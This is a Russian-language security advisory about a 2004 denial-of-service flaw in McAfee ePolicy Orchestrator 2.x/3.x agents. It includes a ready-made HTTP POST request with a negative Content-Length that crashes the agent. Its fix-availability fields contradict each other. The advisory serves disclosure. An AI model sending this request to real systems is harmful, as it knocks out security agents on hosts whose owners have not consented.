Security Lab

Удаленный отказ в обслуживании против McAfee ePolicy Orchestrator

Дата публикации:28.01.2004
Всего просмотров:2032
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Локальная сеть
Воздействие: Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: McAfee ePolicy Orchestrator 2.x
McAfee ePolicy Orchestrator 3.x
Уязвимые версии: McAfee ePolicy Orchestrator

Описание: Уязвимость обнаружена в McAfee ePolicy Orchestrator. Удаленный пользователь может аварийно завершить работу агента.

Удаленный пользователь может представить отрицательное значение параметра Content-Length, чтобы вызвать переполнение буфера и аварийно завершить работу целевого агента.

 
POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 HTTP/1.0
Accept: application/octet-stream
Accept-Language: en-us
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; SPIPE/3.0; Windows)
Host: KILL_EPO
Content-Length: -1
Connection: Keep-Alive

URL производителя: http://www.nai.com/us/products/mcafee/antivirus/fileserver/epo.htm

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: CVE: CAN-2004-0095